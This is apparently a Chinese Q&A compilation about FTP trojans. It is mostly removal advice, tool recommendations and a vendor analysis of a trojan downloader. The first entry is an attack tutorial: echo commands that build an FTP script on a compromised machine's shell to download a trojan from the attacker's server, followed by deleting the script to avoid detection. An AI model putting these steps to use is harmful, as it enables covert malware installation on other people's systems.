㈠ 怎樣把木馬上傳到FTP伺服器里
有的時候我們自己的計算機沒有公網IP地址,這個時候想用TFTO就比較麻煩了,如果你嫌上面的辦法比較麻煩的話,那你還可以用這個比較簡單的辦法就是用FTP,但是我們在得到的SHELL里不能直接登陸我們的FTP伺服器去下載東西,這涉及到一些FTP協議的問題,在這里就不詳述了,我們只是討論怎麼傳文件嘛!當我們不能直接傳的時候我們可以換個辦法來實現,這個辦法就是寫個<A
href="ftp://ftp.txt">ftp.txt的文件來向FTP伺服器提交就可以了。在我們得到的肉雞的SHELL里寫入以下代碼:
echo
ftp >ftp.txt
echo open伺服器ip [埠]>>ftp.txt
echo
username>>ftp.txt
echo password>>ftp.txt
echo get
sample.exe>>ftp.txt
echo
bye>>ftp.txt
其中伺服器ip就是你放你想傳的文件的FTP的伺服器
IP地址;username就是你登陸你的FTP的帳號;password就是你的密碼;sample.exe就是你想下載的程序名字。最後一個bye是退出FTP伺服器。
其中218.XXX.XX.163
就是我的FTP伺服器的IP地址,iceskysl就是我的用戶名,653917就是我的密碼;mt.exe就是我想下載的文件。我們DIR下看看寫成功這個<A
href="ftp://ftp.txt">ftp.txt么?
為了確保我們沒有寫錯,最好還是用TYPE命令來看看這個 <A
href="ftp://ftp.TXT">FTP.TXT文件的內容是不是我們想寫進去的,一般來說是不會錯的!接著執行ftp -s:ftp.txt
就可以下載到們的那個文件了,我這里下載的就是MT.exe這個文件,顯示的就是我成功下載的提示了。
記得最後要用del <A
href="ftp://ftp.txt">ftp.txt來刪掉我們寫的這個TXT文件,要不被發現了我們就虧大了!現在這個文件就傳上去了,接著怎麼做就不要我教你了吧!
㈡ ftpPOPO木馬怎麼殺
ftpPOPO木馬怎麼殺?
殺毒軟體一般處理不了木馬
木馬應該使用木馬專殺工具來清理
1.推薦免費的、漢化的AVG
Anti-Spyware
7.5.1.43
http://www.tmxy.net/qt/avg.htm
他的資料庫中的特徵碼數量是1104118
2.Windows清理助手
http://www.tmxy.net/xt/arswp.htm
3.a-squared
Free
V3.0
中文版
http://www.tmxy.net/qt/a-squared.htm
可以查殺1226523種木馬、後門、蠕蟲、撥號器、間諜軟體和廣告軟體
這些都是綠色軟體
不需要安裝
不隨系統啟動
與任何殺毒軟體都沒有沖突
㈢ 怎麼刪除ftp的木馬代碼
如果是文件的話 用殺毒軟體去刪除吧
直接針對文件殺毒
一般木馬中毒都是通過下載軟體,瀏覽未知網頁
Trojan一詞的特洛伊木馬本意是特洛伊的,指特洛伊木馬,是木馬計的故事
木馬會盜取你的賬號,信息等資料
如果電腦中了木馬建議盡快殺毒以免造成系統問題
可以先做一次全盤殺毒
然後針對性的:
【騰訊電腦管家】--工具箱--【木馬剋星】 (針對於殺了又出現的頑固病毒)
最後開啟實時防毒保護。
㈣ ftppopo木馬
首先升級殺毒軟體至最新病毒庫,清除臨時文件,關閉「系統還原」,重啟電腦,進入「安全模式」下殺毒即可。
㈤ ftpPOPO木馬 怎麼清除啊
先找到安裝路徑然後進安全模式殺掉,刪除其安裝目錄,搜索注冊表收到的全刪,搜全盤搜到全刪重啟就可以了
㈥ 什麼是FTP木馬
木馬下載者 Trojan-Downloader.Win32.QQHelper.ftp
病毒名稱
Trojan-Downloader.Win32.QQHelper.ftp
捕獲時間
2007年9月9日
病毒症狀
該木馬程序是一個用Delphi語言編寫的木馬,長度127,488 位元組,無裝飾性圖標,發作後將自身和釋放的庫文件Vermin.dll插入explorer.exe及其子進程,在後台下載其他木馬程序。
病毒分析
該木馬是一個比較頑固的木馬程序,觸發後會拷貝自身文件到系統目錄的inf文件夾下執行,並將其注冊為服務名為"Windows Media Service"的系統服務以獲得系統許可權,服務描述"管理多媒體設備,如果服務被終止,音頻設備及其音效將不能正常工作。如果此服務被禁用,任何依它的服務將無法啟動";釋放Vermin.dll監控系統消息;通過調試手段將自身映像和Vermin.dll模塊注入到explorer.exe及其所有子進程中,在後台調用相關下載函數下載其他木馬程序;通過查找窗口以及窗口類的方式獲取某些安全軟體的進程,嘗試強行終止安全軟體進程或通過發送消息強行關閉其窗口;使用IFEO映像劫持系統文件ctfmon.exe(即Windows任務欄的語言欄工具條)到病毒映像路徑,使得木馬會在開機時自動啟動。
感染對象
Windows2000/Windows XP/Windows2003
傳播途徑
文件捆綁/網頁木馬傳播
安全提示
已安裝微點主動防禦軟體的用戶,無論您是否已經升級到最新版本,微點主動防禦都能夠有效防禦該木馬程序。如果您沒有將微點主動防禦軟體升級到最新版,微點主動防禦軟體在發現該病毒後將報警提示您「發現未知木馬」,請直接選擇刪除處理(如圖1);
如果您已經將微點主動防禦軟體升級到最新版本,微點將報警提示您發現Trojan-Downloader.Win32.QQHelper.ftp」,請直接選擇刪除(如圖2)。
使用其它殺毒軟體的用戶,請盡快將您的殺毒軟體特徵庫升級到最新版本進行查殺,並開啟防火牆攔截網路異常訪問,如依然有異常情況請注意及時與專業的安全軟體廠商聯系獲取技術支持。由於該病毒的特殊性,會自動終止某些殺毒軟體運行,如果您的殺毒軟體已經無法正常運行,您也可以嘗試安裝微點解決。
沒有安裝微點主動防禦軟體的用戶,建議您盡快安裝使用微點主動防禦軟體查殺預防各類新病毒。
㈦ FTPPOPO木馬怎麼殺
FTPPOPO木馬怎麼殺????
殺毒軟體一般處理不了木馬
木馬應該使用木馬專殺工具來清理
1.推薦免費的、漢化的AVG
Anti-Spyware
7.5.1.43
http://www.tmxy.net/qt/avg.htm
他的資料庫中的特徵碼數量是1110723
2.Windows清理助手
http://www.tmxy.net/xt/arswp.htm
3.a-squared
Free
V3.0
中文版
http://www.tmxy.net/qt/a-squared.htm
可以查殺1245136種木馬、後門、蠕蟲、撥號器、間諜軟體和廣告軟體
這些都是綠色軟體
不需要安裝
不隨系統啟動
與任何殺毒軟體都沒有沖突
㈧ 360老是彈出ftp木馬
使用金山網盾,網路搜索金山網盾,打開點擊一鍵修復,清理掉正在運行的病毒進程。然後點擊"免費殺毒",安裝金山毒霸2011後全盤徹底殺毒
注意,360會攔截金山網盾安裝,如果你有360,請先打開360木馬防火牆,點擊進程防火牆的已開啟按鈕暫時關閉
(如發現網盾不能掃描,請在任務欄右鍵退出360的托盤)
㈨ FTP木馬 是什麼
這個木馬最討厭的地方在於,殺掉還會再生。木馬原始文件好像還沒有人找到。但是可以使用免疫的方法廢掉它的武功。
病毒文件在windows/help文件夾里生成.bat.vbshelp.dll(或許文件名稱會有不同)請用記事本打開這些文件,講裡面的東西刪光,再保存。或者刪除文件再用記事本新建同名同擴展名的空文件。然後文件屬性改成只讀。OK!這樣它再也不能發作了。
這招基本對所有會再生的病毒和木馬都有效!~
******************************************************************
大家中的不一樣,所以文件名不同是正常的,這幾個文件的作用就是從指定網站下載大量病毒和木馬。很多新病毒木馬都是用的這樣的方法,不過文件和存放位置不同,大家要仔細找找,*.bat這個文件是判斷你的機子里有沒有他們的病毒,沒有就調用help.dll和ftp從help.dll指定的網站下載主要的病毒體。自己要找到這幾個文件,做成空文件代替,用360檢查還有,但是那已經是你做的空文件了,沒有任何危害你的能力了。
這幾個文件通常會在c盤根目錄下,windows下windows/help下和system32下,自己好好找找,help.dll和*.vbs可以用記事本打開,*.bat可以直接右鍵編輯,裡面的內容字要懂點英文很容易看懂
㈩ 求助:ftp木馬怎麼殺
那就先下載個SREng掃個日誌傳上來看看能不能找點線索